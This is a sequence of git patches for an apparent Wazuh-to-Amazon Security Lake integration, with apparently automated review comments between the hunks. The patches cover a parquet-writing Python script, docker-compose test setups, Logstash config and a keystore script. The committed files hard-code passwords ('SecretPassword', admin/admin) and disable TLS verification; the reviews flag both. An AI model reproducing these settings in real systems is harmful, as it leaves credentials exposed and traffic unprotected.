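Review bot: `encode_parquet(list, foldername, filename)` names its first parameter `list`, shadowing the builtin inside the function, and builds the target with `'{}/{}.parquet'.format(foldername, filename)`, so a folder with a trailing slash yields `dir//file` and an unset one yields `None/...`; `os.path.join(foldername, filename + '.parquet')` (the file already imports `os`) plus a check that the folder exists is safer. In map_block the new `ocsf_mapped_alert = {}` before the loop is never read before being reassigned, and `for line in range(0, length)` reuses `line` as the counter — `for _ in range(length):` says what is meant.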
@@ -52,36 +26,28 @@ def map_block(fileobject, length): break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) - #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() - if __name__ == "__main__": - clock = datetime.datetime.now(datetime.timezone.utc) - clockstr = clock.strftime('%F_%H.%M.%S') + date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') - parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') - parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') - parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') - parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate 
debugging') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - #with open(ocsf_mapping_filename) as jsonfile: - # mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] 
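Review bot: `-o/--outputfolder` has neither a default nor `required=True`, so a run without it leaves `args.outputfolder` as None and the first flush writes to a literal `None/wazuh-<date>.parquet` relative to the working directory instead of failing at startup; add `required=True` (or a sane default) and verify the folder exists before buffering. `logging.basicConfig` is still hard-wired to `level=logging.DEBUG`, so `--debug` remains a no-op and every buffered alert is dumped to `/tmp/stdintosecuritylake.txt` via `logging.debug(json.dumps(output_buffer))`; tie the level to `args.debug`. `type=bool` together with `action='store_true'` on `--debug` is rejected by argparse at parse time.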
@@ -89,22 +55,20 @@ def get_elapsedseconds(reference_timestamp): try: while True: - ### We can possibly replace all the custom code here - ### and just use Arrow's built-in input and output facilities: - ### * https://arrow.apache.org/docs/python/memory.html#input-and-output - ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas - ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - - current_block = map_block(stdin, args.linebuffer ) - if current_block[-1] == block_ending : - output_buffer += current_block[0:current_block.index(block_ending)] - time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.bucketname,args.foldername) + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] - output_buffer.append(current_block) + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") @@ -116,4 +80,3 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise - exit(1) From e06203c32c3bbac39639abe4ff8819ed90663e7e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:38:53 -0300 Subject: [PATCH 43/77] Remove unnecessary type declaration from debug flag --- integrations/amazon-security-lake/stdin_to_securitylake.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 4fdecc14c073e..b8fa6c17bbf4c 100755 
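Review bot: The EOF case of the new loop body looks unterminated: once the writer closes stdin, `readline()` returns `''` on every call, and if `map_block` (defined above this hunk) marks that the same way it marks an empty poll, each iteration appends nothing, sleeps `args.sleeptime` and goes round `while True` again instead of flushing and exiting; distinguishing "no data yet" from EOF in `map_block` and breaking out of the loop would fix it. `current_block[-1]` also raises `IndexError` if `map_block` ever returns an empty list (for example with `--linebuffer 0`), so an `if not current_block:` guard before the comparison is cheap. `starttimestamp` is read in the flush condition but initialised outside the hunk.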
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -36,7 +36,7 @@ def get_elapsedseconds(reference_timestamp): if __name__ == "__main__": date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') From 6826e127a60ef34551349dff86a0a6cc11816637 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 17:00:15 -0300 Subject: [PATCH 44/77] Improved parquet encoding --- .../stdin_to_securitylake.py | 29 ++++++++++++------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index b8fa6c17bbf4c..ec90025d9afa3 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 +#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 import os import sys 
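Review bot: The new shebang `#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3` hard-codes one developer's home directory, so the script is not executable on any other machine or inside the containers the later commits build. `#!/usr/bin/env python3`, which the first version of the file used, with the venv activated (or a venv path resolved at install time) keeps it portable. The previous `/src/...` shebang had the same problem, so this is a good moment to settle it.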
@@ -13,8 +13,13 @@ block_ending = { "block_ending": True } def encode_parquet(list,foldername,filename): - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + try: + table = Table.from_pylist(list) + print(table) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + except Exception as e: + logging.error(e) + raise def map_block(fileobject, length): output=[] @@ -44,7 +49,8 @@ def get_elapsedseconds(reference_timestamp): parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: @@ -55,12 +61,6 @@ def get_elapsedseconds(reference_timestamp): try: while True: - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] current_block = map_block( stdin, args.linebuffer ) 
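Review bot: `-l/--logoutput` is still parsed but no longer used: the `logging.basicConfig(...)` call that consumed `args.logoutput` is left behind as a comment and replaced by a stderr-only configuration, so the option silently does nothing. Either drop the argument or keep it live, e.g. `logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG)` when the flag is given and the stream variant otherwise; the commented-out line should be deleted rather than kept. In the `encode_parquet` hunk the parameter named `list` (context line) shadows the builtin; renaming it to `records` would make the new `try` body easier to read.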
@@ -70,6 +70,15 @@ def get_elapsedseconds(reference_timestamp): else: output_buffer += current_block + if len(output_buffer) == 0: + continue + + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + logging.info('Writing data to parquet file') + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + starttimestamp = datetime.datetime.now(datetime.timezone.utc) + output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) From 9cfc24786cd96d6c4f239e3d4e64db0475299c12 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 15:38:04 -0300 Subject: [PATCH 45/77] Initial commit for test env's docker-compose.yml --- .../stdin_to_securitylake.py | 1 - integrations/docker/docker-compose.yml | 117 ++++++++++++++++++ 2 files changed, 117 insertions(+), 1 deletion(-) create mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ec90025d9afa3..eee82036c3ff5 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -15,7 +15,6 @@ def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - print(table) parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) except Exception as e: logging.error(e) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml new file mode 100644 index 0000000000000..ebd6b348c5116 --- /dev/null +++ b/integrations/docker/docker-compose.yml 
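Review bot: Every flush writes the same file: `'wazuh-{}'.format(date)` uses `date`, which is computed once at start-up, and `encode_parquet` writes to `'{}/{}.parquet'.format(foldername, filename)`, so the second flush overwrites the first and only the last batch of events ever survives in `outputfolder`. Deriving the name per flush, e.g. `encode_parquet(output_buffer, args.outputfolder, 'wazuh-{}'.format(datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S')))`, plus a sequence counter for flushes within the same second, keeps each batch. The `except KeyboardInterrupt:` path also exits with whatever is still in `output_buffer` unwritten, so a final `encode_parquet` of a non-empty buffer before `exit(0)` would avoid silently dropping buffered alerts. The `while True` loop begins outside this hunk.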
@@ -0,0 +1,117 @@ +version: "3.8" + +services: + + events-generator: + image: events-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y python3-requests + container_name: events-generator + volumes: + - ../tools/events-generator:/home/events-generator + hostname: events-generator + working_dir: "/home/events-generator" + entrypoint: sh -c "python3 run.py" + networks: + wazuh-indexer-dev: + aliases: + - events-generator + ipv4_address: 172.18.0.2 + depends_on: + - wazuh-indexer + + wazuh-indexer: + image: wazuh/wazuh-indexer:4.8.0-beta1 + container_name: wazuh-indexer + hostname: wazuh-indexer + restart: always + networks: + wazuh-indexer-dev: + aliases: + - wazuh-indexer + ipv4_address: 172.18.0.3 + ports: + - "9222:9200" + depends_on: + - generator + environment: + - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" + - "bootstrap.memory_lock=true" + - 'INDEXER_PASSWORD=SecretPassword' + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - ./wazuh-indexer-data:/var/lib/wazuh-indexer + - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem + - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem + - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem + - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml + - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml + + generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + volumes: + - ./config/wazuh_indexer_ssl_certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml + environment: + - 
HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS + + logstash: + image: logstash + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https + WORKDIR /home/logstash + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt update && \ + apt install -y logstash && \ + chown -R logstash:logstash /etc/logstash && \ + chown logstash:logstash /home/logstash + entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic + container_name: logstash + hostname: logstash + user: logstash + volumes: + - ../amazon-security-lake:/home/logstash + - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf + - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml + networks: + wazuh-indexer-dev: + aliases: + - logstash + ipv4_address: 172.18.0.4 + depends_on: + - wazuh-indexer + - s3-ninja + + s3-ninja: + image: scireum/s3-ninja + container_name: s3-ninja + hostname: s3-ninja + volumes: + - ./s3-ninja_data:/home/sirius/data + networks: + wazuh-indexer-dev: + aliases: + - s3-ninja + ipv4_address: 172.18.0.5 + ports: + - "9444:9000" + +networks: + wazuh-indexer-dev: + ipam: + config: + - subnet: "172.18.0.0/16" From 324d1f5033871722a60c4b1b54ac16b9bee5eb6e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 16:52:36 -0300 Subject: [PATCH 46/77] Remove sudo references from docker-compose.yml --- integrations/docker/docker-compose.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml index ebd6b348c5116..dd7f12f119e05 100644 --- a/integrations/docker/docker-compose.yml 
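Review bot: `entrypoint: /usr/share/bin/logstash --path.settings ...` in the `logstash` service looks like a wrong path: the apt package installs the binary at `/usr/share/logstash/bin/logstash` (the path the compose file and `setup.sh` added later on this page use), so the container would exit immediately. `INDEXER_PASSWORD=SecretPassword` is a literal credential committed to the repository; `INDEXER_PASSWORD=${INDEXER_PASSWORD}` with a `.env` file keeps even a test password out of git. `HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS` is handed to the certs generator verbatim, which breaks its outbound requests until the placeholder is edited; `HTTP_PROXY=${HTTP_PROXY:-}` makes it opt-in. The `wazuh-indexer` service bind-mounts `config/wazuh_indexer_ssl_certs/*` files that only the `generator` service produces, and `depends_on` orders start-up but does not wait for those files, so the first run may fail on missing certificates.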
+++ b/integrations/docker/docker-compose.yml @@ -73,8 +73,8 @@ services: FROM ubuntu:20.04 RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ apt update && \ apt install -y logstash && \ chown -R logstash:logstash /etc/logstash && \ From cb5ac7321bea365f46965b8bb5fa1359991422ac Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Wed, 21 Feb 2024 16:34:34 +0100 Subject: [PATCH 47/77] Add operational Python module to transform events to OCSF --- .../amazon-security-lake/docker-compose.yml | 67 +++++++++++ .../logstash/{ => pipeline}/pipe-output.conf | 11 +- .../logstash/{ => pipeline}/wazuh-s3.conf | 0 .../amazon-security-lake/logstash/setup.sh | 15 +++ .../amazon-security-lake/ocsf/__init__.py | 2 - .../amazon-security-lake/ocsf/converter.py | 89 -------------- .../ocsf/wazuh-event.sample.json | 90 -------------- .../amazon-security-lake/requirements.txt | 3 +- integrations/amazon-security-lake/run.py | 34 ++++++ .../stdin_to_securitylake.py | 5 +- .../transform/__init__.py | 1 + .../transform/converter.py | 112 ++++++++++++++++++ .../transform/legacy/legacy_converter.py | 87 ++++++++++++++ .../legacy/legacy_test.py} | 10 +- .../transform/models/__init__.py | 2 + .../transform/models/ocsf.py | 66 +++++++++++ .../transform/models/wazuh.py | 50 ++++++++ .../wazuh-event.sample.json | 76 ++++++++++++ 18 files changed, 525 insertions(+), 195 deletions(-) create mode 100644 integrations/amazon-security-lake/docker-compose.yml rename integrations/amazon-security-lake/logstash/{ => pipeline}/pipe-output.conf (69%) rename integrations/amazon-security-lake/logstash/{ => pipeline}/wazuh-s3.conf (100%) create mode 100644 integrations/amazon-security-lake/logstash/setup.sh delete mode 100644 integrations/amazon-security-lake/ocsf/__init__.py delete mode 100644 integrations/amazon-security-lake/ocsf/converter.py delete mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json create mode 100644 integrations/amazon-security-lake/run.py create mode 100644 integrations/amazon-security-lake/transform/__init__.py create mode 100644 integrations/amazon-security-lake/transform/converter.py create mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py rename integrations/amazon-security-lake/{ocsf/test.py => 
transform/legacy/legacy_test.py} (57%) create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/amazon-security-lake/docker-compose.yml new file mode 100644 index 0000000000000..6c5c1c21445c9 --- /dev/null +++ b/integrations/amazon-security-lake/docker-compose.yml 
@@ -0,0 +1,67 @@ +version: '3' +services: + opensearch-node: + image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues + container_name: opensearch-node + environment: + - cluster.name=opensearch-cluster + - node.name=opensearch-node + - discovery.seed_hosts=opensearch-node + - cluster.initial_cluster_manager_nodes=opensearch-node + - bootstrap.memory_lock=true + - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - opensearch-data:/usr/share/opensearch/data + networks: + - opensearch-net + opensearch-dashboards: + image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + container_name: opensearch-dashboards + ports: + - 5601:5601 # Map host port 5601 to container port 5601 + expose: + - "5601" # Expose port 5601 for web access to OpenSearch Dashboards + environment: + OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + networks: + - opensearch-net + logstash: + build: + context: . 
+ dockerfile_inline: | + FROM logstash:8.12.1 + + COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh + COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config + + RUN bash /usr/share/logstash/bin/setup.sh + RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + container_name: logstash + environment: + LOG_LEVEL: trace + LOGSTASH_KEYSTORE_PASS: "SecretPassword" + MONITORING_ENABLED: false + ports: + - "5000:5000/tcp" + - "5000:5000/udp" + - "5044:5044" + - "9600:9600" + depends_on: + - opensearch-node + networks: + - opensearch-net + command: tail -f /dev/null + # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + +volumes: + opensearch-data: + +networks: + opensearch-net: \ No newline at end of file diff --git a/integrations/amazon-security-lake/logstash/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf similarity index 69% rename from integrations/amazon-security-lake/logstash/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf index 4f64eb5a46a54..0cc7a7d089ec3 100644 --- a/integrations/amazon-security-lake/logstash/pipe-output.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf @@ -1,11 +1,10 @@ input { opensearch { - hosts => ["127.0.0.1:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" + hosts => ["opensearch-node:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => false index => "wazuh-alerts-4.x-*" - ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" query => '{ "query": { "range": { @@ -15,7 +14,7 @@ input { } } }' - target => "_source" + target => "_source" schedule => "* * * * *" } } 
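Review bot: `RUN bash /usr/share/logstash/bin/setup.sh` in the inline Dockerfile runs the keystore setup at build time, so the keystore holding the indexer credentials (and the `LOGSTASH_KEYSTORE_PASS` it was created with) is baked into an image layer and travels with the image; creating the keystore from an entrypoint at container start, or with a BuildKit build secret, keeps it out of the layers. `LOGSTASH_KEYSTORE_PASS: "SecretPassword"` is also a committed literal, and the same value sits in `setup.sh`, so there are two places to rotate; `LOGSTASH_KEYSTORE_PASS: ${LOGSTASH_KEYSTORE_PASS}` fed from a `.env` file gives one. `opensearchproject/opensearch:latest` and `opensearch-dashboards:latest` are unpinned, which the comments on those lines already warn about; pin both to the version this `logstash:8.12.1` image was tested against. `command: tail -f /dev/null` leaves the container idle with the real command commented out, so the compose file as committed does not run the pipeline.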
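Review bot: `ssl => false` together with `hosts => ["opensearch-node:9200"]` disables TLS to the indexer, while the compose file added in the same commit points Dashboards at `https://opensearch-node:9200`; one of the two is inconsistent, and if the node serves HTTPS this input fails to connect rather than falling back. Removing `ca_file` along with `ssl => true` also drops certificate verification, so when TLS is restored it has to be wired up again; keeping `ssl => true` and `ca_file => "<path to the node CA>"` (placeholder) avoids sending the keystore credentials in clear text on the docker network. The switch to `${INDEXER_USERNAME}`/`${INDEXER_PASSWORD}` matches the keys that `setup.sh` stores in the keystore.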
diff --git a/integrations/amazon-security-lake/logstash/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf
similarity index 100%
rename from integrations/amazon-security-lake/logstash/wazuh-s3.conf
rename to integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf
diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh
new file mode 100644
index 0000000000000..2b1fc109f401a
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/setup.sh
@@ -0,0 +1,15 @@
+#!/usr/bin/bash
+
+# This script creates and configures a keystore for Logstash to store
+# indexer's credentials. NOTE: works only for dockerized logstash.
+# Source: https://www.elastic.co/guide/en/logstash/current/keystore.html
+
+# Prepare keystore
+set +o history
+export LOGSTASH_KEYSTORE_PASS="SecretPassword"
+set -o history
+
+# Create keystore
+/usr/share/logstash/bin/logstash-keystore create
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD
diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py
deleted file mode 100644
index 777a7d20549b5..0000000000000
--- a/integrations/amazon-security-lake/ocsf/__init__.py
+++ /dev/null
@@ -1,2 +0,0 @@
-# Python module placeholder
-# TODO export submodules
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py
deleted file mode 100644
index c927afa8fe87f..0000000000000
--- a/integrations/amazon-security-lake/ocsf/converter.py
+++ /dev/null
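Review bot: `set +o history` / `set -o history` around the `export` has no effect here: a non-interactive bash script does not record history, and the value being shielded, `SecretPassword`, is a literal in the committed file anyway. The keystore is then filled with `echo "admin" | ... add INDEXER_USERNAME` and `echo "admin" | ... add INDEXER_PASSWORD`, so the default admin credentials are hard-coded as well; reading them from the environment, e.g. `echo "${INDEXER_PASSWORD:?}" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD`, and requiring `LOGSTASH_KEYSTORE_PASS` to be supplied by the caller, keeps secrets out of the repository and the image. `logstash-keystore create` may also prompt when a keystore already exists, so a second run of the script inside the container stalls; checking for the keystore file first makes it idempotent.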
@@ -1,89 +0,0 @@ -#!/usr/bin/python3 - -# event comes from Filebeat -#event = {} -#print(event) - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": { - #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), - "dummy": True - }, - "technique": { - #"name": join(event["_source"]["rule"]["mitre"]["technique"]), - #"uid": join(event["_source"]["rule"]["mitre"]["id"]), - "dummy": True - }, - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." 
- }, - "version": "1.1.0", - }, - #"raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] - }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - #event["_source"]["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] - ], - #"nist": event["_source"]["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json deleted file mode 100644 index 3f35697a9fe36..0000000000000 --- a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json +++ /dev/null 
@@ -1,90 +0,0 @@ -{ - "_index": "wazuh-alerts-4.x-2024.02.08", - "_id": "yBMliY0Bt8FzffO0BOIu", - "_version": 1, - "_score": null, - "_source": { - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - 